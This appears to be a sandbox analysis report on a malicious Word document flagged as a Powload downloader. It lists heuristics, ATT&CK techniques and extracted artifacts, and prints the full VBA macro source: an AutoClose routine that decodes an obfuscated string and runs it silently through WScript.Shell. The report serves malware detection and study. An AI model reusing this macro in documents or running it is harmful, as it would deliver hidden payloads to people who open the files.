MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OOXML document containing VBA macros. The AutoClose macro is present and utilizes WScript.Shell to execute a command. The ClamAV detection 'Doc.Downloader.Powload-6707242-0' strongly suggests the Powload family, which is known for downloading and executing second-stage payloads. The VBA script appears to obfuscate a command that is then executed via Application.Run, likely to download and run a malicious payload.
Heuristics 7
-
ClamAV: Doc.Downloader.Powload-6707242-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6707242-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
If lampshell - dubby > 1 Then CreateObject("WScript.Shell").Run herbicolous, 0 tetrodotoxin = False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
If lampshell - dubby > 1 Then CreateObject("WScript.Shell").Run herbicolous, 0 tetrodotoxin = False -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() guardianships = Array("R", "r", "e", "", "D", "n", "0", "U", "0", "4", "e", "", "", "b", "p", "A", "A", "Q", "Z", "m", "R", "D", "r", "X", "0", "", "Z", "s", "W", "X", "D", "r", "", "m", "i", "e", "N", "X", "0", "n", "i", "Z", "R", "A", "G", "f", "c", "A", "", "0", "m", "U", "n", "b", "e", "b", "S", "O", "", "R", "D", "g", "", "m", "O", "R", "q") -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2113 bytes |
SHA-256: 2d391a0c45f31b8270c7027aca5f1583869f986a725dc2bbe0c945d7729f4ee1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function firestorms(guardianships)
phacidiaceae = Array("R", "4", "", "A", "Z", "c", "p", "g", "n", "i", "D", "U", "q", "G", "S", "O", "X", "b", "r", "W", "s", "Q", "N", "f", "m", "e", "0")
alphorn = Array("m", " ", "t", "/", "o", "O", ":", "=", ".", "c", "a", "x", "g", "I", "?", "u", "n", "p", "s", "v", "y", "f", "i", "S", "r", "h", "e")
meningoencephalitis = vbNullString
For Each activable In guardianships
overcreed = wily(activable, phacidiaceae, UBound(phacidiaceae))
If overcreed > -1 Then
meningoencephalitis = alphorn(overcreed) & meningoencephalitis
End If
Next
firestorms = StrReverse(meningoencephalitis)
End Function
Public Function wily(yardkeep, duchy, anemically)
offsaddle = 3
areas = 1992
For offsaddle = 0 To anemically
If duchy(offsaddle) = yardkeep Then
areas = offsaddle
End If
Next
If areas = 1992 Then
areas = -1
End If
wily = areas
End Function
Sub AutoClose()
guardianships = Array("R", "r", "e", "", "D", "n", "0", "U", "0", "4", "e", "", "", "b", "p", "A", "A", "Q", "Z", "m", "R", "D", "r", "X", "0", "", "Z", "s", "W", "X", "D", "r", "", "m", "i", "e", "N", "X", "0", "n", "i", "Z", "R", "A", "G", "f", "c", "A", "", "0", "m", "U", "n", "b", "e", "b", "S", "O", "", "R", "D", "g", "", "m", "O", "R", "q")
anthropomorphological = firestorms(guardianships)
Application.Run "classification", anthropomorphological
End Sub
Private Sub classification(herbicolous)
dubby = DateDiff("s", #1/1/1970#, Now())
tetrodotoxin = True
While tetrodotoxin
lampshell = dubby + 60
If lampshell - dubby > 1 Then
CreateObject("WScript.Shell").Run herbicolous, 0
tetrodotoxin = False
End If
Wend
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes |
SHA-256: 2628e71d3f81e363f481851dc2efe9cb60c4e1b606a0f6b48b3cddefc77d0f0c |
|||
|
Detection
ClamAV:
Doc.Downloader.Powload-6707242-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.